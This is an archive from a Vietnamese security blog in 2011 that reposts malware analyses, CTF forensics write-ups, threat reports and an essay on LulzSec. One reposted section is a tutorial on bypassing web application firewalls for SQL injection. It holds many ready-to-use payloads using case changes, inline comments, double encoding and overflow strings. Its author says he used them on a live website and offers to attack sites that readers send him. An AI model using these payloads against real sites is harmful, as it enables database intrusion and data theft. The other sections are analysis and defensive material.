Tổng quát về Tội phạm máy tính

- Khái niệm - Đặc điểm - Tính chất

Tố giác tội phạm máy tính như thế nào?

Cách thức, thể thức và trình tự

Miễn phí bản quyền phần mềm

Tập hợp bản quyền miễn phí theo ngày

28 June 2011

[Avast blog] Flash malware that could fit a Twitter message

When analysing malware you are most likely to encounter samples which use all kinds of obfuscation in order to hide from antivirus software that protects your computer. This is also true for malware written in flash (more specifically, ActionScript). Flash is very popular among malware writers these days because many people use it on daily basis. Sometimes, they don’t even know it’s flash that runs all the fancy stuff which takes place on their screen! Recently I came across a sample that uses a very nice trick to hide its purpose from everyone who tries to look under its hood. What is more interesting, this sample is actually smaller than 140 bytes, which means it could fit in a Twitter message!  That is rather unusual for flash files, which tend to be considerably larger. But don’t worry, this is not a case of malware spreading through Twitter in its binary form. Maybe via malicious links, but that is another story.
So apart from the small file size, what is so interesting about this sample? Since it is very small, lets see the hexdump of it:

Hexdump of the original sample
Hexdump of the original sample

Nothing unusual to see here, because we are looking at a compressed flash file (see the “CWS” header at the beginning). Okay, so lets unpack it and look again:

Hexdump of the unpacked sample
Hexdump of the unpacked sample

Now this is much better. We can see the uncompressed header (“SWF“) and there are some plaintext strings right at the end of the file, notably “/:$version” and “_root”. At first glance, this does not look very suspicious, but there is more. I’ve run this sample through some of our fancy tools to get a better idea of what is in the file. You might not be familiar with the structure of flash files, so let me explain it a bit. Every flash file consists of a mandatory header (that thing beginning with “SWF” or “CWS”). This header stores some information about the flash movie, like version, size and so on. Then comes a sequence of so called “tags”. A tag is a block of data which begins with a header that contains an ID (an unique number telling flash player what kind of tag this is, because there are many different tags) and length of the tag. One of the defined tags is the “End” tag, which tells the flash player that after this tag, there are no more tags (so the file ends, or at least should end  ). With this brief tutorial, we can have a look at the tags in this particular sample:

List of tags
List of tags

As you can see, the first tag is reported as “Unknown”. Because of backwards compatibility, flash simply skips any tags that it does not recognize, so we can skip this one too. Out of the remaining tags, the only interesting for us is the DoAction tag and ShowFrame tag. The ShowFrame is important because it actually makes Flash Player execute all actions defined before it (simplified a bit). The DoAction tag is where all the magic happens. This tag contains ActionScript code, which can do various stuff ranging from a simple puzzle game to a video player. Because there is nowhere else to look for malicious code, lets try our luck and dig deeper into this particular tag. A quick disassembly reveals some interesting stuff:

Code in the DoAction tag
Code in the DoAction tag

Ooops, what is that? We can immediatelly tell there is something fishy about this code. First of all, there are numerous instructions that are not known. Better yet, there we see the ActionPush instruction which is used to push data on the ActionScript Virtual Machine stack. In this case, it pushes the data from a so called “constant pool”, which is just a fancy name for an array of strings. But where is this array defined? An ActionConstantPool instruction is used to define this array, but it is not in the code above! Does it mean this code will not work? Of course not. In order to reveal the secrets of it, we must look a bit back. In the list of tags we see that the DoAction tag should be 103 bytes long, but the largest offset in our instruction list is only 47! The sequence of bytes at that spot in the file is FC FF 88, which “translates” into an action of code FC (not defined) and length 0x88FF. Since the file is only 131 bytes long, this is clearly bullshit. But dont worry, lets patch the file a bit to remove this obstacle and see what happens:

Code in the DoAction tag - second attempt
Code in the DoAction tag - second attempt

Now that is interesting! An ActionConstantPool sitting right after the “obstacle” we just removed! There was actually another hint that some useful data will be at the end of the tag – the first instruction of all is an ActionJump which jumps in the code by the given offset. The offset in this case is 0x2C, so the new address will be 0×31 (since the jump action is 5 bytes long and we need to add those too). All these tricks are here to defeat disassemblers or any kind of static analysis. So what does the sample do? When the code runs, first thing it does is it jumps forward to the constant pool definition and then jumps a bit backwards, right at offset 0x0A where the ActionPush is. Remmember that before we said this action is invalid since there is no constant pool? Thats no longer true, so all is well and the code goes on. Its pretty simple now to get the resulting code, it will be something like this:

Final code
Final code

The sample simply checks the version of your flash player and opens an appropriate flash movie, which can contain exploits that work in that particular version of flash player. So its actually a downloader, something that opens doors into your computer and lets the bad things in. All this in just slightly over 130 bytes of flash.



Source: https://blog.avast.com/2011/06/28/flash-malware-that-could-fit-a-twitter-message/

27 June 2011

[Lập trình] Microsoft Visual Studio 2005


  1. Go to the Control Panel and launch Add/Remove Programs
  2. Remove "Microsoft SQL Server 2005 Express Edition"
  3. Remove "Microsoft SQL Server 2005 Tools Express Edition"
  4. Remove "Microsoft SQL Native Client"
  5. Remove "Microsoft Visual Studio 64bit Prerequisites Beta" (This step is needed only if Visual Studio is installed on a 64-bit machine)
  6. Remove "Microsoft Visual Studio Tools for Office System 2005 Runtime Language Pack" (This step is not needed if you have only the English Edition)
  7. Remove "Microsoft Visual Studio Tools for Office System 2005 Runtime Beta"
  8. Remove "Microsoft Device Emulator 1.0 Beta"
  9. Remove "Microsoft .NET Compact Framework 2.0 Beta"
  10. Remove "Microsoft .NET Compact Framework 1.0"
  11. Remove "Microsoft Visual Studio 2005 Professional" or other related IDE installs such as (Visual Studio Professional/Standard/Enterprise Architect/Team Suite, etc.)
  12. Remove "Microsoft Document Explorer 2005 Language Pack" (This step is not needed if you have only the English Edition)
  13. Remove "Microsoft Document Explorer 2005" (This step is needed for post-Beta2 builds)
  14. Remove "Microsoft SQL Mobile 2005 Development Tools"
  15. Remove "Microsoft 64-bit SDK" (This step is only needed if Visual Studio is installed on a 64-bit machine)
  16. Remove "Microsoft Visual Studio 2005 Remote Debugger (x64)" (This step is needed only if Visual Studio is installed on a 64-bit machine)
  17. Remove "Microsoft MDAC 2.8 SP1" (This step is needed only if you are running Windows 2000)
  18. Remove "Microsoft MSXML 6 SDK and Parser"
  19. Remove "Microsoft Visual J# .NET Redistributable 2.0 Beta Language Pack" (This step is not needed if you have only the English Edition)
  20. Remove "Microsoft Visual J# Redistributable Package 2.0 Beta"
  21. Ensure all Visual Studio 2005 products have been removed from your system
  22. Remove "Microsoft .NET Framework 2.0 Beta Language pack" (This step is not needed if you have only the English Edition)
  23. Remove "Microsoft .NET Framework 2.0 Beta"

Notes:
  1. If you see an error removing J# .NET Redistributable Package 2.0 from Add/Remove Programs, please run "msiexec /x {9046F10C-F5E7-4871-BED9-8288F19C70DF}" from a command line window<
     
  2. If you see an error removing .NET Framework 2.0 from Add/Remove Programs, please run "msiexec /x {71F8EFBF-09AF-418D-91F1-52707CDFA274}" from a command line window
To download a tool that may help you clean your computer in preparation for installing Visual Studio 2005, please visit this link. Please Note: This tool is not supported or thoroughly tested by Microsoft. This is a free tool and you should use it at your own risk. No warranty or support is provided, expressed or implied.



System Requirements for Installing Visual Studio 2005
Processor Minimum:
  • 600 megahertz (MHz) Pentium processor
Recommended:
  • 1 gigahertz (GHz) Pentium processor recommended
Operating System Visual Studio 2005 can be installed on any of the following systems:
  • Microsoft® Windows® 2000 Professional SP4
  • Microsoft® Windows® 2000 Server SP4
  • Microsoft® Windows® 2000 Advanced Server SP4
  • Microsoft® Windows® 2000 Datacenter Server SP4
  • Microsoft® Windows® XP Professional x64 Edition (WOW)
  • Microsoft® Windows® XP Professional SP2
  • Microsoft® Windows® XP Home Edition SP2
  • Microsoft® Windows® XP Media Center Edition 2002 SP2
  • Microsoft® Windows® XP Media Center Edition 2004 SP2
  • Microsoft® Windows® XP Media Center Edition 2005
  • Microsoft® Windows® XP Tablet PC Edition SP2
  • Microsoft® Windows Server™ 2003, Standard Edition SP1
  • Microsoft® Windows Server™ 2003, Enterprise Edition SP1
  • Microsoft® Windows Server™ 2003, Datacenter Edition SP1
  • Microsoft® Windows Server™ 2003, Web Edition SP1
  • Microsoft® Windows Server™ 2003, Standard x64 Edition (WOW)
  • Microsoft® Windows Server™ 2003, Enterprise x64 Edition (WOW)
  • Microsoft® Windows Server™ 2003, Datacenter x64 Edition (WOW)
  • Microsoft® Windows Server™ 2003 R2, Standard Edition
  • Microsoft® Windows Server™ 2003 R2, Standard x64 Edition (WOW)
  • Microsoft® Windows Server™ 2003 R2, Enterprise Edition
  • Microsoft® Windows Server™ 2003 R2, Enterprise x64 Edition (WOW)
  • Microsoft® Windows Server™ 2003 R2, Datacenter Edition
  • Microsoft® Windows Server™ 2003 R2, Datacenter x64 Edition (WOW)
 Installation of Visual Studio 2005 on the Intel Itanium (IA64) is not supported.
RAM1 Minimum:
  • 192 megabytes (MB)
Recommended:
  • 256 MB
Hard Disk2 Without MSDN:
  • 2 GB of available space required on installation drive
  • 1 GB of available space required on system drive
With MSDN:
  • 3.8 GB of available space required on installation drive with a full MSDN install or
    2.8 GB of available space required on installation drive with a default MSDN install.
  • 1 GB of available space required on system drive
CD or DVD Drive Not required
Display Minimum:
  • 800 x 600 256 colors
Recommended:
  • 1024 x 768 High Color - 16-bit
Mouse Microsoft mouse or compatible pointing device


25 June 2011

[RAT] No pain, no gain

Dễ bỏ qua người quan trọng nhất
NÓNG VỘI
Không có quý nhân
Tình cảm
:))

[Forensic Tool] Dropbox Reader™

Dropbox Reader consists of six Python scripts:

  • read_config script outputs the contents of the Dropbox config.db file in human-readable form. This includes the user's registered e-mail address and Dropbox identifier, software version information, and a list of the most-recently-changed files.
  • read_filecache_config script outputs configuration information from the Dropbox filecache.db file. This includes information about shared directories that are attached to the user's Dropbox account.
  • read_filejournal script outputs information about Dropbox synchronized files stored in the filecache.db file. This includes local and server-side metadata and a list of block hashes for each Dropbox-synchronized file.
  • read_sigstore script outputs information from the Dropbox sigstore.db file, which is an additional source of block hashes.
  • hash_blocks script produces a block hash list for any file. This block hash list can be compared to the block hashes from read_filejournal or read_sigstore.
  • dropbox_contains_file script hashes one or more files (as per hash_blocks) and compares the resulting block hash list to the files listed in filecache.db (as per read_filejournal) and reports whether the files are partially or exactly the same as any Dropbox-synchronized files.
Download: http://download.atc-nycorp.com/utilities/DropboxReader_1.0.zip
Source: http://www.cybermarshal.com/index.php/cyber-marshal-utilities/dropbox-reader

23 June 2011

[ESET] The Social Networking/Cybersafety Disconnect

A recent Survey commissioned by ESET and conducted online by Harris Interactive from May 31-June 2, 2011 among 2,027 U.S. adults 18+ found a startling disconnect between user concerns about privacy and security and their actions on social networking sites.
To start, the study found that 69% of online social networking account owners are concerned about security on social networking sites, yet 1/3 of them have never changed their passwords for their social networking accounts and another 15% last changed their password more than one year ago.

Moreover, the survey revealed that one in ten online Americans with social networking accounts have reported that an unknown party gained unauthorized access to their social networking account to spread malicious links and comments. This is particularly alarming since unauthorized access can threaten account owner’s cybersecurity as well as that of their contacts—we’ve seen countless examples, including recent scams around the death of Osama Bin Laden.

The survey also found that 67% of account owners claimed that they were concerned about privacy issues, yet 55% of the account owners update their privacy settings less often than once every six months, if ever. This can be problematic. For example, Facebook makes it extremely difficult to know when you need to change settings because they virtually never advise users when they are making changes that may affect user privacy.

While 69% of account owners were concerned about security and 67% expressed concern about privacy there were other significant concerns reported as well.
• 37% of were concerned about someone creating a fake account in their name.
• 95 percent of social networking account owners accept friend/follower/connection request always or sometimes.
• 71 percent of social networking account owners are concerned that their personal information entered on social networking sites may be sold or shared without their knowledge for profit.
• 17% were concerned about their children using social networking sites.

So, what can you do to secure yourself and your contacts on social networks?
A common misperception seems to have many users believing that social networking safety and privacy is entirely outside of their control. This is not the case—you can easily improve your online security if you follow these simple guidelines:
#1: Be smart about passwords.
How important is it to change your social networking password on a regular basis and at what interval should you change it? This is actually a subset of the question of how often should you change passwords in general. The answer to this question depends upon a few factors.
Do you use the same password for your multiple social networking accounts, email accounts, and other online services? If you answer yes to this, then about once every 5 minutes is the optimal interval for changing your password. When you use the same password everywhere it only takes one Sony-style mistake to compromise all of your accounts. Remember, your passwords are on the Internet, and they are not entirely under your control. Is your password a word in any language? A number such as 12345. If so, then perhaps an interval of once every 10 minutes is appropriate. To put it simply, you can’t change your password often enough if you are using a poor password. For some tips on using good passwords I recommend that you refer to ESET Researcher Paul Laudanski’s blog “No chocolates for my passwords please!
Assuming a good password and no significant enemies, I am unaware of a scientific formula for the optimal period for password changes. In general I would expect for a service like Facebook, every three to six months will be sufficient, yet the survey found that 70% of social networking account owners have not changed their password within the last 90 days. Events like breaking up with a vindictive partner, finding that your computer or smartphone has been compromised, etc. would tend to mandate a password change sooner rather than later.
#2: Know your options when it comes to privacy, and check back often.
Facebook may report to the media that they are making a change, but often the change is gradually rolled out and secretly slipped past users. Facebook appears to deliberately use this approach to drive adoption of “features” they fear users will find nefarious. The reality is that with Facebook you probably should be checking your privacy settings every couple of weeks if you want a chance to keep on top of what Facebook may have changed in your account. Once again, Paul Laudanski has an excellent blog about Facebook privacy settings with best practices and tips to keep Facebook users safe. Don’t be fooled though, Facebook privacy has never been “set and forget” and is not likely to be anytime soon. As hard as you work to control your privacy, Facebook’s marketing department is working twice as hard to find new ways to share your data without informed consent.
#3: Know who your real “friends” are.
Be sure that anyone whose “friendship” or connection you accept is someone you know and trust. For the 11% of social networking account owners that indicated concern about the number of friends/followers/contacts they have, all I can say is that it is your choice and you have to make your own decisions. We can provide you with advice and guidance, but we can’t and won’t tell you who to associate with.
#4: When in doubt, seek help from outside resources.
For those of you concerned with your children’s use of social networking sites, I would highly recommend a visit to http://www.safetynetcc.org/, a collaborative cyber safety education program of the San Diego Internet Crimes Against Children Task Force and the San Diego Police Foundation.
Methodology
This survey was conducted online within the United States by Harris Interactive on behalf of Schwartz Communications from May 31-June 2, 2011 among 2,027 adults ages 18 and older, of whom 1,476 have social networking accounts. This online survey is not based on a probability sample and therefore no estimate of theoretical sampling error can be calculated. For complete survey methodology, including weighting variables, please email us here.
Randy Abrams
Director of Technical Education
Cyber Threat Analysis Center
ESET North America



Source: 
http://blog.eset.com/2011/06/22/the-social-networkingcybersafety-disconnect

[RAT] Lulz + Anonymous = AntiSec

This is an exhortation: think beneath the surface of what you are told. The subject is Lulz Security and the Anonymous group. They have aligned themselves in the AntiSec operation against the Establishment; but before simply condemning them I would like us all to consider the issues.
Let’s look at some of the few facts we know. Firstly, there is no evidence of what most people consider to be criminal behaviour: theft for personal gain or simple wanton destruction (it is criminal behaviour simply because what they do is against the law). Rather do they consider themselves engaged in political activism on the internet, although Lulz also claims that it is just plain ‘fun’.
AntiSec is aimed at both the government establishment and what Lulz calls the whitehat security industry:
Operation Anti-Security is in effect. Join the fleet and tear the government and whitehat peons limb from limb – #antisec winds are strong.
Government I understand. But why wage war against the security industry? Lulz offers this:
Your tax money is being used to pay for things to not be secured so that people like us can take what you expect to be kept inaccessible.
Is that a pop against the billions of tax dollars and pounds used by government to store our personal details online? Or is it a pop against the security industry that uses additional tax money to maintain, but fails to maintain, the security of that data online. Consider the following from a press release put out by Idappcom (a whitehat security company):
Yesterday, the Serious Organised Crime Agency (Soca) was subject to a distributed denial of service (DDoS) attack designed to bring down its website. Today LulzSec say they have ‘blissfully obtained records of every single citizen who gave their records to the security-illiterate UK government for the 2011 census’.
But Lulz says:
Just saw the pastebin of the UK census hack. That wasn’t us – don’t believe fake LulzSec releases unless we put out a tweet first.
Idappcom added:
The attacks of yesterday were not damaging but a Twitter post today has threatened that future attacks will be.
I’ve looked. Believe me I have looked. But I cannot find a Lulz tweet that says anything like this. The nearest I can find is this:
DDoS is of course our least powerful and most abundant ammunition. Government hacking is taking place right now behind the scenes. #AntiSec
But that’s not a threat of damage, it’s a claim that they are breaking into sites and not just taking them down.
So some aspects of government and industry (and I have to add, media) are playing up the threat from Lulz. Why? Well, fear sells. If we are afraid of all hacking activity we will more likely accept the loss of personal liberty that governments demand in the name of security for purposes of control. And if we are afraid of hackers we will more likely buy security products from the whitehat industry. And the more afraid we are, the more we will buy from both government and industry.
So, sadly, I would suggest that the methods chosen for AntiSec will be counterproductive to the ends: it plays into the hands of the establishment they attack. But this is what I want you to ask yourselves: what else can the politically conscientious youth of today do? It’s not like my day back in the ’60s and ’70s. We’re not allowed to protest peacefully today: we get illegally corralled, beaten, filmed, and stored. So what I want you to ask yourselves is this: is AntiSec today’s version of taking to the streets in the way that my generation did all those years ago? And do they not have a point? Consider the illegal wars that our governments engage in. Think of the lies they tell us. Think of the way the banks control us through control of the (and usually our) money. Think of the way in which dissent is quashed. Think of Dr David Kelly. Think of the war against terror that fills the coffers of our munitions industries but has made the world less safe for everyone. I’d like to suggest this: in a few years time, AntiSec will be part of our university sociology and psychology courses. Is AntiSec the inevitable result of a government divorced from its people: discuss.


Source: http://kevtownsend.wordpress.com

22 June 2011

[Lập trình] C#

[Securityoverride.com] Forensics Level 4

Level 1
Level 2
Level 3
Level 4



The following is a wireshark trace file of an HTTP authentication forensics4.rar.
Find the username and password of the HTTP authentication and enter it below to receive credit.
Username:
Password:

The server IP is 192.168.0.1 and client IP is 192.168.0.3
Wireshark is a network protocol analyzer for Unix and Windows and can be downloaded here.

Bắt đầu nào





Vấn đề rút ra là
In the context of an HTTP transaction, the basic access authentication is a method designed to allow a web browser, or other client program, to provide credentials – in the form of a user name and password – when making a request.


Before transmission, the user name is appended with a colon and concatenated with the password. The resulting string is encoded with the Base64 algorithm. For example, given the user name Aladdin and password open sesame, the string Aladdin:open sesame is Base64 encoded, resulting in QWxhZGRpbjpvcGVuIHNlc2FtZQ==. The Base64-encoded string is transmitted and decoded by the receiver, resulting in the colon-separated user name and password string.

While encoding the user name and password with the Base64 algorithm typically makes them unreadable by the naked eye, they are as easily decoded as they are encoded. Security is not the intent of the encoding step. Rather, the intent of the encoding is to encode non-HTTP-compatible characters that may be in the user name or password into those that are HTTP-compatible.

Security Concerns-
Although the scheme is easily implemented, it relies on the assumption that the connection between the client and server computers is secure and can be trusted. Specifically, if SSL/TLS is not used, then the credentials are passed as plaintext and could be intercepted easily. The scheme also provides no protection for the information passed back from the server.


Existing browsers retain authentication information until the tab or browser is closed or the user clears the history. [1] HTTP does not provide a method for a server to direct clients to discard these cached credentials. This means that there is no effective way for a server to "log out" the user without closing the browser. This is a significant defect that requires browser manufacturers to support a 'logout' user interface element or API available to JavaScript, further extensions to HTTP, or use of existing alternative techniques such as retrieving the page over SSL/TLS with an unguessable string in the URL.
Đừng hỏi mình nhé :))
Hoac đừng hỏi sao đó là là Base64 ... đây thực là là những ví dụ điển hình và đơn giản thôi. Luyện skill là chính


[Securityoverride.com] Forensics Level 3

Level 1
Level 2
Level 3

The following is a wireshark trace file of an SMTP authentication forensics3.rar.
Find the username and password of the SMTP authentication and enter it below to receive credit.
Username:
Password:

The server IP is 192.168.0.1 and client IP is 192.168.0.3
Wireshark is a network protocol analyzer for Unix and Windows and can be downloaded here

Để có thể giải được level 3... Bạn cần tìm hiểu 1 chút về SMTP Authentication


Rồi, sau khi nghiên cứu... ta bắt đầu nào


9    0.430619    192.168.0.1    192.168.0.3    SMTP    S: 334 VXNlcm5hbWU6
10    0.430619    192.168.0.3    192.168.0.1    SMTP    C: QXVkaQ==
11    0.430619    192.168.0.1    192.168.0.3    SMTP    S: 334 UGFzc3dvcmQ6
12    0.430619    192.168.0.3    192.168.0.1    SMTP    C: MTIzNGFk

Thử nào :))
Vấn đề rút ra là

Extended SMTP (ESMTP), sometimes referred to as Enhanced SMTP, is a definition of protocol extensions to the Simple Mail Transfer Protocol standard. The extension format was defined in IETF publication RFC 1869 (1995) which established a general structure for all existing and future extensions.

The SMTP-AUTH extension provides an access control mechanism. It consists of an authentication step through which the client effectively logs in to the mail server during the process of sending mail.

This LOGIN authentication method encrypts the user's name and password using the Base64 encoding scheme. Because decrypting a Base64-encoded string is trivial, LOGIN is not considered a secure authentication method and should be avoided.

[Securityoverride.com] Forensics Level 2

Level 1
Level 2



The following is a wireshark trace file of an SMTP transfer forensics2.rar.
Find the senders email address and the recipients email address of the SMTP transfer and enter it below to receive credit.
Sender:
Recipient:

The server IP is 192.168.0.1 and client IP is 192.168.0.3
Wireshark is a network protocol analyzer for Unix and Windows and can be downloaded here.






 Vấn đề:


SMTP is a core Internet protocol used to transfer e-mail messages between servers (first defined in RFC 821 in 1982). This contrasts with protocols such as POP3 and IMAP, which are used by messaging clients to retrieve e-mail.

SMTP servers look at the destination address of a message and contact the target mail server directly. Of course, this means the Domain Name Service (DNS) has to be configured correctly otherwise mail could be handed to the wrong server - potentially a big problem because, unless you have encrypted your messages, your e-mail will be in plain text!

SMTP was designed to be a reliable message delivery system. Reliable in this case means that a message handled by SMTP is intended to get to its destination or generate an error message accordingly. This is not the same as a guaranteed delivery service, it just does its best. To guarantee delivery requires all sorts of data exchanges that would add considerable communications overhead that would be pointless for everyday purposes.

SMTP communications are transported by TCP to ensure reliable end-to-end transport. RFC 822 defines the format of SMTP messages.

RFC 822 is a straightforward specification that breaks the message into headers and bodies separated by a blank line. In the header are a number of keywords and values that define the sending date, sender's address, where replies should go, and so on, while the body contains the data.

[Securityoverride.com] Forensics Level 1

Ngồi luyện forensic tý vậy :))
1. Reg 1 account tại http://securityoverride.com
2. Check mail và thử nghiệm nào

Level 1:



The following is a wireshark trace file of an FTP authentication forensics1.rar.
Find the username and password of the FTP authentication and enter it below to receive credit.
Username:

Password:
The server IP is 192.168.0.1 and client IP is 192.168.0.3
Wireshark is a network protocol analyzer for Unix and Windows and can be downloaded here.
===================================================================
Rồi...
Tải cái Forensic1.rar về xem nào..........




Vấn đê chốt là:

The original FTP specification is an inherently unsecure method of transferring files because there is no method specified for transferring data in an encrypted fashion. This means that under most network configurations, user names, passwords, FTP commands and transferred files can be captured by anyone on the same network using a packet sniffer. This is a problem common to many Internet protocol specifications written prior to the creation of SSL, such as HTTP, SMTP and Telnet. The common solution to this problem is to use either SFTP (SSH File Transfer Protocol), or FTPS (FTP over SSL), which adds SSL or TLS encryption to FTP as specified in RFC 4217.
Ở đây còn 1 số vấn đề nhỏ như port, cơ chế.   . . v.v. Tự Google nhé... :)

[Securityoverride] WAF Bypass: SQL injection(Forbidden or not?)


This is such a wide Topic, but today were going to examine WAF bypas and SQL injection What is a WAF? A WAF is a Web Application Firewall used to filter certain malicious requests and/or keywords. Is a WAF a safe way to protect my Website? Well, thats a tough question. A WAF alone will not protect your website if your code is vulnerable, but a WAF and secure coding will. A WAF should be used as a tool in your tool shed, but you should never count on a WAF to keep attackers out because most, if not all WAF's can be bypassed with the time and
brains.Today,we will take a look into how exactly to do this

1)Comments:
SQL comments are a blessing to us SQL injectors. They allow us to bypass alot of the restrictions of Web application firewalls and to
kill certain SQL statements to execute the attackers commands while commenting out the actual legitimate query. Some comments in
SQL :

Code

  //, -- , /**/, #, --+, -- -, ;
 





2)Case Changing: Some WAF's will filter only lowercase attacks As we can see we can easily evade this by case changing:

Possible Regex filter:
Code

   /union\sselect/g
 



Code

   id=1+UnIoN/**/SeLeCT, or with  XSS ->  alert(1)




3)Inline Comments: Some WAF's filter key words like /union\sselect/ig We can bypass this filter by using inline comments most of the time, More complex examples will require more advanced approach like adding SQL keywords that will further separate the two words:
Code

   id=1/*!UnIoN*/SeLeCT
 


Take notice of the exclamation point /*!code*/ The exclamation point executes our SQL statement.

Inline comments can be used throughout the SQL statement so if table_name or information_schema are filtered we can add more inline comments. For example, lets pretend a site filters union,where, table_name, table_schema, =, and information_schema.. These are 3 statements we need to inject our target.
For this we would:
Code

   id=1/*!UnIoN*/+SeLeCT+1,2,concat(/*!table_name*/)+FrOM /*information_schema*/.tables /*!WHERE */+/*!TaBlE_ScHeMa*/+like+database()-- -



The above code would bypass the filter. Notice we can use "like" instead of "="

Another way to use inline comemnts, when everything seems to fail you can try to through the application Firewall off by crafting a SQL statement using variables:
Code

 id=1+UnIoN/*&a=*/SeLeCT/*&a=*/1,2,3,database()-- -



The above code should bypass the Union+select filters even where common inline comments didn't work itself

4)Buffer Overflow:/Unexpected input:

Alot of WAFS are written in the C language making them prone to overflow or or act differently when loaded with a bunch of data. Here is a WAF that does it's job correctly, but when given a large amount of Data allows the malicious request and response.
Code

id=1 and (select 1)=(Select 0xAAAAAAAAAAAAAAAAAAAAA 1000 more A's)+UnIoN+SeLeCT+1,2,version(),4,5,database(),user(),8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26
,27,28,29,30,31,32,33,34,35,36--+



This bypass above works. I myself just used this against a Web site recently.

5)Replaced keywords(preg_replace and/or WAF's with the same action): Sometimes and application will remove all of a keyword. For instance, lets say we have a filter that replaces union select with whitespace. We could bypass that filter like so:

Code

 id=1+UNIunionON+SeLselectECT+1,2,3--



As you can see once union+select has been removed our capital UNION+SELECT takes its place successfully injecting our query:
Code

UNION+SELECT+1,2,3--




6)Charachter encoding:
Most WAF's will decode and filter an applications input, but some WAFs only decode the input once so double encoding can bypass certain filters as the WAF will decode the input once then filter while the Application will keep decoding the SQL statement executing our code.

Examples of double encoding:
Code

id=1%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/1,2,password%252f%252a*/FROM%252f%252a*/Users--+




Some examples of double encoding are:
Code

   Single Quote ' %u0027
                          %u02b9
                          %u02bc
                          %u02c8
                          %u2032
                          %uff07
                          %c0%27
                          %c0%a7
                         %e0%80%a7
 ______________________________
   White Space:    %u0020
                             %uff00
                             %c0%20
                             %c0%a0
                             %e0%80%a0
 _______________________________
  (                         %u0028
                            %uff08
                            %c0%28
                            %c0%a8
                            %e0%80%a8
_____________________________
 )                         %u0029
                           %uff09
                           %c0%29
                           %c0%a9
                           %e0%80%a9
______________________________






7)Putting it all together: After bypassing a few WAF's the task gets easier and easier, but here are some ways to find out how to bypass "your" targetted WAF:


7a)Breaking the SQL statement: To find out exactly whats filtered you need to break your own SQL syntax and check for keywords being filtered, seeing if the keyword is filtered alone or in the prescence of other SQL keywords. For instance, if union+select is giving you a Forbidden or a Internal Server Error, try removing Union and seeing what happens with just Select and vice-versa

7b)Verbose Errors: When breaking the SQL syntax you use the errors to guide you on just needs to be done for instance if were were injecting the broken syntax(Removed union to stop Forbidden errors):
Code

 id=1+Select+1,2,3--



And the error was something like:
Code

Error at line 1 near \" \"+1,2,3--



We could gather that maybe the Word Select is being filtered out and replaced with white space. We could confirm this by injection something like:
Code

sel%0bect+1,2,3



From there we would see if we can see a Select error. If we did a few more checks will give us a the answer we need to bypass this WAF. This is just one of many ways to break down the SQL syntax. You may have to keep breaking it, while bypassing different parts.

8)Advanced Bypassing Techniques: As stated earlier once you have bypassed a few WAF's it gets easier and easier and more and more FUN:P When one finds himself running into a wall try going through all the miscreant characters to see whats allowd and whats not allowed. These characters can be: [;:{}()*&$/|<>?"'] We can use these characters to possibly craft a working SQL exploit. For instance, during a WAF bypass I was doing everything was being either filtered or replaced. I noticed that all * were being replaced with whitespace which meant no inline comments. Union+select was also
properly filtered to produce a Forbidden error. In this instance I was able to use the replaced * to craft my exploit like so:

Code

id=1+uni*on+sel*ect+1,2,3--+



When the * were filtered out the union+select fell right into place. Now, UNunionION+SELselectECT wasn't working because union and select were not being replaced only * was. This is a common WAF bypass. Find the replaceable character and you find the exploit:)

Some other bypasses:
Code

id=1+(UnIoN)+(SelECT)+
id=1+(UnIoN+SeLeCT)+
id=1+(UnI)(oN)+(SeL)(EcT)
id=1+'UnI''On'+'SeL''ECT' <-MySQL only
id=1+'UnI'||'on'+SeLeCT' <-MSSQL only




As of MySQL 4.0 it is said that Uni/**/on+Sel/**/ect will not work for bypass, but if the application firewall was customized to Filter /**/ out to whitespace it will work no matter what the version.

If anyone needs any help bypassing filters after reading and trying the above tactics please pm me with the website and I will give it a go. I love this shit!!!!!!!!!!!!!!! I know this isn't an exhaustive filter bypass tutorial, but using the above methods(and your brain) will help you bypass most WAF's today.


Enjoy!!


sources:
http://securityoverride.com/articles.php?article_id=95&article=WAF_Bypass:_SQL_injection%28Forbidden_or_not?%29

21 June 2011

[Tài liệu] Anonymous attack Malaysia Government Sites


The 10 sites are:
  • http://www.warez-bb.org
  • http://thepiratebay.org
  • http://www.movie2k.to
  • http://www.megavideo.com
  • http://www.putlocker.com
  • http://www.depositfiles.com
  • http://www.duckload.com
  • http://www.fileserve.com
  • http://www.filestube.com
  • http://www.megaupload.com

Source: http://www.darknet.org.uk

[Tài liệu] Securelist - Spam in May 2011

 

May in figures

  • The amount of spam in email traffic increased by 2.1 percentage points compared to April and averaged 82.9%.
  • Phishing emails accounted for 0.02% of all mail traffic, a decrease of 0.01 percentage points compared to the previous month.
  • Malicious files were found in 4.1% of all emails, an increase of 0.45 percentage points compared to April’s figure (read more.........)
Source: http://www.securelist.com

[Tài liệu] AVG community powered threat report - Q2/2011




Mobile Malware
As anticipated in our last report, this year mobile malware is going to make the headlines. A lot of this may be explained by the massive and practically defenseless target posed by the exploding number of smart phones, tablets and other advanced mobile devices. 
Gartner foresees that the total mobile communication devices' sales to the end user will reach ~413 million devices – this is an ‘attractive’ target for hackers.
Responding to this development we noticed that cyber criminals are shifting more resources from PC to mobile. The current low security awareness among mobile users opens the door for cyber criminal to monetize quickly.
Additionally, the fact that there is no need to go through the evolution of malware development which was necessary for PC targeted attacks, the knowledge and the tricks are already there. Cyber criminals just have to execute.
AVG Threat labs have spotted various monetization methods criminals are using on mobile platforms. The most popular being Premium SMS.  All they need to do is persuade a user to download an App that they think they need. When nstalled it sends an SMS to a premium number to monetize that victim. Below is one example out of many we found this quarter. 
China mobile is considered the world largest phone operator with more than 70% of the Chinese domestic market and 518 million subscribers (source:
Guardian.co.uk).
1.  The chosen attack vector was a text message to China Mobile subscribers.
2.  It used a phishing attack, disguised as coming from China Mobile, trying to lure users to believe that this is coming from 10086 and China Mobile.
The message contained a link to a phishing site. 
3.  The cyber criminals used a domain name which is similar to the legitimate site, 1oo86.cn instead of the real 10086.cn (using the letter “O” instead
of the digit zero) which is difficult to notice by a novice user.
4.  When clicking on the link, an App was downloaded and the user would not suspect anything because they expect that an update will be
downloaded and installed. The attacker gets another advantage here – if the user sees nothing on their device, they forget about it and leave the
malware untouched. 
5.  The criminals developed two variants, one for Android and one for Symbian OS. 

6.  When installed, it performs the following activities:
a.  It downloads a configuration file.
b.  It sends out device information (as IMEI number, phone model, and SDK version)
 c.  It writes to a log file
d.  It allows remote control / monitor the device.
e.  Update mechanism
The crown jewels of this piece of malware are the “premium SMS charges". The malware is sending text messages to premium rate numbers. Premium
